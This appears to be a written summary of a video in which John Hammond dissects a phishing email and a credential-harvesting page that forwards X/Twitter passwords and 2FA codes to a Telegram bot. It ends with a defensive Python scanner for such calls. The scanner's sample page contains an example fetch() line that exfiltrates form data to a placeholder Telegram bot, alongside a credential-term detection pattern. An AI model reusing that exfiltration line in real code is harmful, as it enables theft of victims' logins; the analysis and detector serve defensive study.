
John Hammond Analyzes Phishing Email Targeting Twitter Users
In this video, John Hammond conducts an in-depth analysis of a phishing email he received, which claims that the content of his Twitter (X) page violates X community guidelines. The email, sent via an email relay provider, contains a "Review Details" button that exists only to lure the user into clicking through to the phishing site.

Hammond begins by examining the URL hidden behind the "Review Details" button. Using command-line tools like curl, he discovers that the URL redirects to a fraudulent website. He then opens the site directly in a web browser, revealing a page that mimics a content management interface, likely inspired by TweetDeck or similar tools.

By exploring the page's source code, Hammond finds comments and JavaScript that appear to be attempts to evade automated security mechanisms. He also identifies calls to a Telegram API, suggesting that the stolen information is sent to a Telegram bot. Using a tool called Matkap, Hammond manages to infiltrate the Telegram bot and access the messages it has received, revealing sensitive information such as passwords, two-factor authentication codes, and IP addresses of the victims.

Hammond also discovers that the phishing site uses a third-party API to retrieve information about Twitter users, including their profile photos and usernames. The site is designed to ask users to enter their passwords and then transmit this information to the Telegram bot. He notes that the site also includes features to bypass two-factor authentication by asking users to enter their verification codes.

Using the information retrieved via Matkap, Hammond attempts to contact the individuals behind the Telegram bot, but they seem to block his communication attempts. He also finds clues suggesting that the attackers might be based in Turkey, although he cannot confirm this with certainty.
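The Telegram API calls found in the page source are something a defender can scan for when triaging a suspected phishing page. The following is an added example, not code from the video or from any tool it uses: it flags references to the Telegram Bot API in saved page source, notes whether credential-related field names sit nearby, and never echoes the token secret. The sample page, the placeholder token, the 300-character window and the list of field names are all constructed assumptions.

```python
import re

# Telegram Bot API URLs have the shape api.telegram.org/bot<id>:<secret>/<method>.
HOST = re.compile(r"api\.telegram\.org/bot")
TOKEN = re.compile(r"(\d{6,12}):([A-Za-z0-9_-]{30,})(?:/([A-Za-z]+))?")
# Field names a credential-harvesting form tends to use (assumed list).
SENSITIVE = re.compile(r"password|passwd|2fa|otp|verification", re.I)
WINDOW = 300  # characters of context inspected around each hit (assumed)


def scan_source(source: str) -> list[dict]:
    """Return one finding per Telegram Bot API reference in page source."""
    findings = []
    for hit in HOST.finditer(source):
        # A literal token follows the host directly; kits that build the
        # URL by string concatenation still match HOST but not TOKEN.
        tok = TOKEN.match(source, hit.end())
        context = source[max(0, hit.start() - WINDOW): hit.end() + WINDOW]
        findings.append({
            "offset": hit.start(),
            "literal_token": tok is not None,
            # Keep only the numeric bot id; the secret half is not reported.
            "bot_id": tok.group(1) if tok else None,
            "method": tok.group(3) if tok else None,
            "credential_terms": sorted(
                {t.lower() for t in SENSITIVE.findall(context)}
            ),
        })
    return findings


# Constructed sample input: placeholder token, not a real bot.
FAKE_TOKEN = "0000000000:" + "A" * 35
SAMPLE_PAGE = f"""
<form><input name="password" type="password"><input name="otp"></form>
<script>
fetch("https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage?chat_id=1&text=" + data);
var u = "https://api.telegram.org/bot" + tok + "/sendMessage";
</script>
"""

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_PAGE):
        print(finding)
```

A hit with `literal_token` set and credential terms nearby is a strong signal that form input is being forwarded to a bot; a hit without a literal token still merits a manual look at how the URL is assembled.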
In conclusion, Hammond emphasizes the importance of vigilance against phishing attempts and demonstrates how cybersecurity tools can be used to analyze and counter these threats. He encourages viewers to stay informed and use robust security practices to protect their personal information.